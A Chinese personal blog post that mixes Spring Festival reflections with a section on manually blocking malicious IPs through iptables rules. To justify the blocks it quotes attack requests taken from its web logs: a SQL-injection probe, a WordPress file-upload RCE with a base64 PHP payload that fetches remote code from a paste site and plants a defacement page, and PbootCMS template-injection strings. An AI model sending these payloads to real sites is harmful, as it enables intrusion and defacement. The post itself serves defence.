2025春节终于过完了手动封ip-1 - Gojira 哥斯拉

gojira.net

2025年02月17日星期一农历二〇二五年正月二十日 [蛇年] 阳历乙巳年戊寅月丁巳日水瓶座

超过一年半多没更新了，其实经常都想发博客，有几次想写了长篇想发出来，但最后还是按耐住了。
在万恶的资本主义待了有些年头（本次一年三个月）一些见闻一些感受，有时会有一些话想说出来，但感觉又会留下了“把柄”，免得以后给自己添麻烦。也怕一些人的一句：对对对，外国的月亮就是圆……55be4058
这能将我怼的“哑口无言”，毕竟经历不同、认知不同，很难沟通，更别想着服对方了。就如同过年的回去看到些小时的伙伴，却没什么话说一样。所以还是都作罢。

春期间手机基本全程关机，whatsapp、微信这些信息一条不回复（家人除外），这个春节过得不能用不好来形容了，只能算是完全无感，现在成为了叶开plus，从鼓励叶开、理解叶开、成为叶开、超越叶开的路上我越跑越顺……
说上面这句话其实心理负担还是挺重的，担心叶开兄弟瞎想，给他徒增烦恼，但我没一丁点恶意，也相信他不会误会的。

看了下留言，还有两位朋友（紫慕和叶开）记得我，给我送来了春节祝福，感受有点暖心。
他们也是我经常惦记的两位博友，叶开的博客我经常手动打开去看，关键是他的域名qq.md实在他妈的（惊叹、褒义）太好记了！紫慕90zm.net则是通过蚁阅去看。顺带说一嘴，RSS阅读器我都懒得部署了，蚁阅用起来也挺方便的。

宣布个大消息，我的股票不亏了！盈利就不说了，看者心境不一。但还是要说，大癌真的能不入就不要入！上头了比吸毒还败家，远离它！贝莱德说得真的没错！另外，其实很多时候压榨、收割我们其实并不是所谓的外部势力。

手动封ip-1

近期有空看看web日志，发现采集、攻击太多了，最近这段时间开始了手动封ip，处理这些恶意流量后，总流量降低了至少90%，想着也将这些ip分享出来，总有人能用上的，反正我自己使用，贴出来一下也不费事，以后慢慢累积。

Linux中直接复制执行就可以了。

#2025-02-17
iptables -I INPUT -s 45.192.101.247 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 84.247.151.68 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 175.27.157.221 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.215.149.146 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 61.231.66.147 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 206.189.82.216 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 157.245.63.34 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 196.251.90.127 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 103.1.40.166 -p tcp -m multiport --dports 80,443 -j DROP

封这些ip一般有几个理由：恶意入侵请求、试探下载网站压缩包、采集。
恶意请求例如：

GET /viewthread.php?action=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&tid=%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO))

POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9

POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue

POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue

下面一段封禁了大概 30 多万个阿里云的ip，慎用，不过我自己是封了，它们的请求太多了，不知道是专业代理还是阿里搞的ai模型抓数据？

#封阿里云的一大堆ip，频繁访问，目的不明。
iptables -I INPUT -s 47.100.0.0/14 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 101.132.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 106.14.0.0/15 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.196.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT -s 139.224.0.0/16 -p tcp -m multiport --dports 80,443 -j DROP

每日分析日志再封禁弄起来确实费事，其实还有更简单的，装个waf就行了，只是个人不喜欢。

推荐订阅源

Gojira 哥斯拉

手动封ip-1